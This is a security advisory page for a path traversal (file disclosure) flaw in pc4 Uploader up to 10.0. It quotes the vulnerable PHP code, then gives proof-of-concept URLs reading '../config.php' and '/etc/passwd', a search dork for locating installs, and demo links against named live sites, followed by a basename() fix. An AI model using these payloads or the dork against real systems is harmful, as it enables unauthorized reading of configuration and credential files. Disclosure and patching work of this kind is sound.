pc4 Uploader <= 10.0 Remote File Disclosure Vulnerability

2009.06.27
Credit: none
Risk: High
Local: No
Remote: Yes
CWE: CWE-98


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

=Vuln: pc4arb - pc4 Uploader <= 10.0 Remote File Disclosure Vulnerability =INFO: http://pc4arb.com/article-48.html =BUY: ~~~ =Download: ~~~ =DORK: intext:"Pictures of Whale Penis" ____________ _-=/:Conditions:\=-_ none ---------------------------------------===-------------------------------------- _________________ _-=/:Vulnerable_Code:\=-_ // in "./pc4uploader/upfiles/index.php" function displayimage( $fn, $lastMod, $fs ) { global $out_Types; $ext = explode( ".", $fn ); $ext_i = count( $ext ) - 1; $file_ext = $ext[$ext_i]; header( "Last-Modified: ".$lastMod ); header( "ETag: ".getetag( $fn ) ); header( "Accept-Ranges: bytes" ); header( "Content-Length: ".$fs ); header( "Content-Type: ".$out_Types[$file_ext] ); $fp = fopen( $fn, "rb" ); <-----------------------------//opens $fn with no filtering or precautions taken if ( function_exists( fpassthru ) ) { fpassthru( $fp ); } else { $temp = fread( $fp, $fs ); echo $temp; } fclose( $fp ); return; } // Function displayimage() is later called $file = $_GET['file']; <---------------------------------// again, not filtered or anything. //.. //.. //.. //.. displayimage( $file, "Thu, 01 Jan 2006 12:00:00 GMT", $fs ); ---------------------------------------===-------------------------------------- _______ _-=/:P.o.C:\=-_ http://localhost/pc4uploader/upfiles/index.php?file=../config.php http://localhost/pc4uploader/upfiles/index.php?file=/etc/passwd demo: http://upload.traidnt.net/upfiles/index.php?file=../config.php {Save File to view the code if needed} http://uploader.pc4arb.com/upfiles/index.php?file=../config.php {view source} ---------------------------------------===-------------------------------------- __________ _-=/:SOLUTION:\=-_ //Use this displayimage() function instead, notice the changes.. function displayimage( $fn, $lastMod, $fs ) { global $out_Types; $fn = basename($fn); $ext = explode( ".", $fn ); $ext_i = count( $ext ) - 1; $file_ext = $ext[$ext_i]; header( "Last-Modified: ".$lastMod ); header( "ETag: ".getetag( $fn ) ); header( "Accept-Ranges: bytes" ); header( "Content-Length: ".$fs ); header( "Content-Type: ".$out_Types[$file_ext] ); $fp = fopen( $fn, "rb" ); if ( function_exists( fpassthru ) ) { fpassthru( $fp ); } else { $temp = fread( $fp, $fs ); echo $temp; } fclose( $fp ); return; } //I added $fn = basename($fn);, it will convert anything like "../../config.php" to "config.php" // since config.php doesent exist the script will do the rest by giving a safe error, // also move ./include/default.gif to ./upfiles/default.gif // everything should be good :) ---------------------------------------===--------------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top